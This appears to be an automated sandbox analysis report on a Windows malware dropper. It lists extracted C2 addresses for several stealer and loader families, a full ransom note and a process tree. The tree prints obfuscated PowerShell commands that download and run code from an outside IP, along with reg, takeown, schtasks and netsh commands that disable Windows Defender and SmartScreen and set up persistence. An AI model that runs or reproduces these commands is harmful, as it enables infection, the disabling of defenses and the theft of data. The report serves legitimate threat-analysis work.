Analysis

  • max time kernel
    93s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    12-03-2022 19:01

General

  • Target

    8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe

  • Size

    3.1MB

  • MD5

    ea997966b21de9b9fe246b5846d71f49

  • SHA1

    cd52292099c53419442b0b6fd5ea83066670c577

  • SHA256

    8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca

  • SHA512

    facce05dfb426659aecc47c9cec58b4f32785c050558c739e68635bf54a5c069ffcc654f1d008d08b6d2ab53b805c810b4e86ae4ec38ae80773a3776ff95828f

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Family

redline

Botnet

DomAni2

C2

flestriche.xyz:80

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Extracted

Family

djvu

C2

http://fuyt.org/test3/get.php

Attributes
  • extension

    .xcbg

  • offline_id

    y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1

  • payload_url

    http://zerit.top/dl/build2.exe

    http://fuyt.org/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

  • DcRat 24 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE DCRAT Activity (GET)

    suricata: ET MALWARE DCRAT Activity (GET)

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern

  • suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

    suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 11 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 55 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible privilege escalation attempt 2 IoCs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 3 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 14 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 60 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 18 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 33 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 22 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies registry class 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe
    "C:\Users\Admin\AppData\Local\Temp\8019e48ea4193330275a481783506e84dc5085ca9d6e5e53aee1c60e035e19ca.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3808
      • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_2.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2748
          • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_2.exe
            arnatic_2.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c arnatic_6.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3872
          • C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_6.exe
            arnatic_6.exe
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:2136
            • C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe
              "C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
              6⤵
              • DcRat
              • Executes dropped EXE
              • Checks computer location settings
              • Adds Run key to start application
              • Drops file in System32 directory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2072
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yfXLZxBfsx.bat"
                7⤵
                  PID:4720
                  • C:\Windows\SysWOW64\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:4868
                      • C:\Windows\system32\w32tm.exe
                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                        9⤵
                          PID:4884
                      • C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe
                        "C:\Users\Admin\Documents\8zeYyAhCLyy4MXuHDcnSZuq6.exe"
                        8⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Adds Run key to start application
                        • Drops file in System32 directory
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Drops file in Program Files directory
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:4548
                        • C:\Documents and Settings\WaaSMedicAgent.exe
                          "C:\Documents and Settings\WaaSMedicAgent.exe"
                          9⤵
                          • Executes dropped EXE
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of SetWindowsHookEx
                          PID:5080
                  • C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe
                    "C:\Users\Admin\Documents\HZ0653dQL6eKaM3PHHhKvs1i.exe"
                    6⤵
                      PID:2120
                      • C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe
                        "C:\Users\Admin\AppData\Local\Temp\d3381037-203a-43e3-9362-b9ca4e152f72.exe"
                        7⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4336
                    • C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe
                      "C:\Users\Admin\Documents\4_yza4q88bogYk_cF59XJjyz.exe"
                      6⤵
                      • Executes dropped EXE
                      • Checks processor information in registry
                      PID:1368
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                        7⤵
                        • Blocklisted process makes network request
                        PID:4636
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 600
                        7⤵
                        • Program crash
                        PID:4688
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 944
                        7⤵
                        • Program crash
                        PID:3060
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 952
                        7⤵
                        • Program crash
                        PID:5144
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1036
                        7⤵
                        • Program crash
                        PID:972
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 868
                        7⤵
                        • Program crash
                        PID:5156
                    • C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe
                      "C:\Users\Admin\Documents\ETuSLYkVQqOjTT_usPKsVG0_.exe"
                      6⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4200
                      • C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe
                        "C:\Users\Admin\AppData\Local\Temp\Lxjwaytgkwrfchptbandzip.exe"
                        7⤵
                          PID:1968
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          7⤵
                            PID:5848
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            7⤵
                              PID:5304
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                              7⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2120
                          • C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe
                            "C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"
                            6⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            PID:4252
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uefifces\
                              7⤵
                                PID:4788
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezokegez.exe" C:\Windows\SysWOW64\uefifces\
                                7⤵
                                  PID:4904
                                • C:\Windows\SysWOW64\sc.exe
                                  "C:\Windows\System32\sc.exe" create uefifces binPath= "C:\Windows\SysWOW64\uefifces\ezokegez.exe /d\"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" type= own start= auto DisplayName= "wifi support"
                                  7⤵
                                    PID:4980
                                  • C:\Windows\SysWOW64\sc.exe
                                    "C:\Windows\System32\sc.exe" description uefifces "wifi internet conection"
                                    7⤵
                                      PID:5052
                                    • C:\Windows\SysWOW64\sc.exe
                                      "C:\Windows\System32\sc.exe" start uefifces
                                      7⤵
                                        PID:2204
                                      • C:\Windows\SysWOW64\netsh.exe
                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                        7⤵
                                          PID:3132
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1260
                                          7⤵
                                          • Program crash
                                          PID:4332
                                      • C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe
                                        "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks computer location settings
                                        PID:4148
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1308
                                          7⤵
                                          • Program crash
                                          PID:5568
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1316
                                          7⤵
                                          • Program crash
                                          PID:5872
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1384
                                          7⤵
                                          • Program crash
                                          PID:5052
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f & erase "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe" & exit
                                          7⤵
                                            PID:6032
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f
                                              8⤵
                                              • Kills process with taskkill
                                              PID:5580
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 1360
                                            7⤵
                                            • Program crash
                                            PID:4572
                                        • C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe
                                          "C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          PID:4140
                                        • C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe
                                          "C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          PID:2032
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                            7⤵
                                              PID:2288
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd
                                                8⤵
                                                  PID:6000
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                    9⤵
                                                    • Enumerates processes with tasklist
                                                    PID:1404
                                                  • C:\Windows\SysWOW64\find.exe
                                                    find /I /N "bullguardcore.exe"
                                                    9⤵
                                                      PID:224
                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                      tasklist /FI "imagename eq PSUAService.exe"
                                                      9⤵
                                                      • Enumerates processes with tasklist
                                                      PID:5064
                                                    • C:\Windows\SysWOW64\find.exe
                                                      find /I /N "psuaservice.exe"
                                                      9⤵
                                                        PID:4320
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                        9⤵
                                                          PID:4632
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                          Accostarmi.exe.pif N
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:4220
                                                  • C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe
                                                    "C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Checks computer location settings
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1632
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                      7⤵
                                                      • Blocklisted process makes network request
                                                      • Adds Run key to start application
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:5268
                                                      • C:\Windows\SysWOW64\svchost.exe
                                                        "C:\Windows\System32\svchost.exe"
                                                        8⤵
                                                          PID:5884
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 452
                                                            9⤵
                                                            • Program crash
                                                            PID:6040
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                        7⤵
                                                        • Blocklisted process makes network request
                                                        • Suspicious use of SetThreadContext
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5344
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          8⤵
                                                            PID:2192
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                          7⤵
                                                          • Blocklisted process makes network request
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5440
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                            8⤵
                                                              PID:5176
                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                                9⤵
                                                                • Views/modifies file attributes
                                                                PID:2744
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive
                                                              8⤵
                                                                PID:2448
                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                  attrib +s +h C:\ProgramData\OneDrive
                                                                  9⤵
                                                                  • Views/modifies file attributes
                                                                  PID:1324
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs
                                                                8⤵
                                                                  PID:3976
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"
                                                                    9⤵
                                                                      PID:3872
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "
                                                                        10⤵
                                                                          PID:772
                                                                          • C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exe
                                                                            Offer.exe
                                                                            11⤵
                                                                              PID:5804
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 4
                                                                              11⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:4256
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                              11⤵
                                                                                PID:5016
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                11⤵
                                                                                  PID:5820
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                  11⤵
                                                                                    PID:5668
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                    11⤵
                                                                                      PID:6104
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                      11⤵
                                                                                        PID:5932
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                        11⤵
                                                                                          PID:4316
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                          11⤵
                                                                                            PID:5796
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                            11⤵
                                                                                              PID:4544
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                                              11⤵
                                                                                                PID:1848
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                11⤵
                                                                                                  PID:6020
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
                                                                                                  11⤵
                                                                                                    PID:5028
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
                                                                                                    11⤵
                                                                                                      PID:1164
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
                                                                                                      11⤵
                                                                                                        PID:940
                                                                                                      • C:\Windows\SysWOW64\takeown.exe
                                                                                                        takeown /f "C:\Windows\System32\smartscreen.exe" /a
                                                                                                        11⤵
                                                                                                        • Possible privilege escalation attempt
                                                                                                        • Modifies file permissions
                                                                                                        PID:4236
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
                                                                                                        11⤵
                                                                                                        • Possible privilege escalation attempt
                                                                                                        • Modifies file permissions
                                                                                                        PID:5940
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /im smartscreen.exe /f
                                                                                                        11⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:3880
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
                                                                                                        11⤵
                                                                                                          PID:4080
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
                                                                                                          11⤵
                                                                                                            PID:5280
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                            11⤵
                                                                                                              PID:3968
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                              11⤵
                                                                                                                PID:3328
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                11⤵
                                                                                                                  PID:4604
                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                  11⤵
                                                                                                                    PID:2352
